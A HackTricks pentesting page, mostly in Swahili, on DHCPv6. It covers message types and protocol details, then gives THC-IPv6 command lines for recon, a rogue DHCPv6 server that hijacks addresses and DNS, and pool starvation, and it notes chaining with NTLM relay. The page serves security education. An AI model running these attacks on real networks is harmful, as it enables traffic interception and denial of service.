DHCPv6

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Ulinganisho wa Aina za Ujumbe za DHCPv6 na DHCPv4

Aina ya kulinganisha ya aina za ujumbe za DHCPv6 na DHCPv4 imeonyeshwa kwenye jedwali hapa chini:

DHCPv6 Message TypeDHCPv4 Message Type
Solicit (1)DHCPDISCOVER
Advertise (2)DHCPOFFER
Request (3), Renew (5), Rebind (6)DHCPREQUEST
Reply (7)DHCPACK / DHCPNAK
Release (8)DHCPRELEASE
Information-Request (11)DHCPINFORM
Decline (9)DHCPDECLINE
Confirm (4)none
Reconfigure (10)DHCPFORCERENEW
Relay-Forw (12), Relay-Reply (13)none

Maelezo ya Kina ya Aina za Ujumbe za DHCPv6:

  1. Solicit (1): Huanzishwa na mteja wa DHCPv6 kutafuta seva zinazopatikana.
  2. Advertise (2): Imetumwa na seva kama jibu kwa Solicit, ikionyesha upatikanaji wa huduma ya DHCP.
  3. Request (3): Wateja hutumia hii kuomba anwani za IP au prefixes kutoka kwa seva maalum.
  4. Confirm (4): Inatumika na mteja kuthibitisha kama anwani zilizoteuliwa bado ni halali kwenye mtandao, kawaida baada ya mabadiliko ya mtandao.
  5. Renew (5): Wateja hutuma hii kwa seva ya awali ili kuongeza muda wa maisha ya anwani au kusasisha mipangilio.
  6. Rebind (6): Imetumwa kwa seva yoyote ili kuongeza muda wa maisha ya anwani au kusasisha mipangilio, hasa wakati hakuna jibu la Renew.
  7. Reply (7): Seva hutumia hii kutoa anwani, vigezo vya mipangilio, au kuthibitisha ujumbe kama Release au Decline.
  8. Release (8): Wateja wanaarifu seva kusitisha matumizi ya moja au zaidi ya anwani zilizotolewa.
  9. Decline (9): Imetumwa na wateja kuripoti kwamba anwani zilizotolewa zina mgongano kwenye mtandao.
  10. Reconfigure (10): Seva zinaonya wateja kuanzisha miamala kwa mipangilio mipya au iliyosasishwa.
  11. Information-Request (11): Wateja wanaomba vigezo vya mipangilio bila kupangiwa anwani za IP.
  12. Relay-Forw (12): Wakala wa relay hutuma ujumbe kwa seva.
  13. Relay-Repl (13): Seva zinajibu kwa wakala wa relay, ambao kisha hutoa ujumbe kwa mteja.

Vidokezo vya Haraka vya Protocol (Offensive)

  • DHCPv6 clients hutumia UDP port 546 na servers/relays hutumia UDP port 547.
  • Clients hutuma Solicit kwa All_DHCP_Relay_Agents_and_Servers (ff02::1:2); seva/relays husikiliza huko. All_DHCP_Servers ni ff05::1:3.
  • Utambulisho wa client na server unabebwa katika OPTION_CLIENTID na OPTION_SERVERID kwa kutumia DUIDs. Hii ni muhimu kwa fingerprinting ya host ile ile wakati anwani zinabadilika.
  • Uteuzi wa anwani unaombwa na IA_NA (non-temporary address) na prefix delegation na IA_PD (downstream router prefix).

Quick Recon

# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'

# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>

Seva Isiyoidhinishwa ya DHCPv6 (Anwani/DNS Hijack)

# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>

Hii ni server ya rogue DHCPv6 ya on-link ya jumla. Katika mitandao ya Windows/AD, unganisha hii na higher-level relays (angalia ukurasa wa IPv6) ikiwa unataka NTLM relay primitives.

Ukomeshwa wa pool / DHCPv6 Starvation

# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>

Tahadhari kuhusu Ujumbe wa Reconfigure

DHCPv6 Reconfigure haikubaliwi kiholela: wateja huikubali tu ikiwa kwa wazi walituma OPTION_RECONF_ACCEPT. Kwa chaguo-msingi, mteja hayuko tayari kukubali ujumbe za Reconfigure, hivyo shambulio zisizothabiti za Reconfigure mara nyingi hushindwa isipokuwa ukiona au kusababisha chaguo hilo.

Pentesting IPv6

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks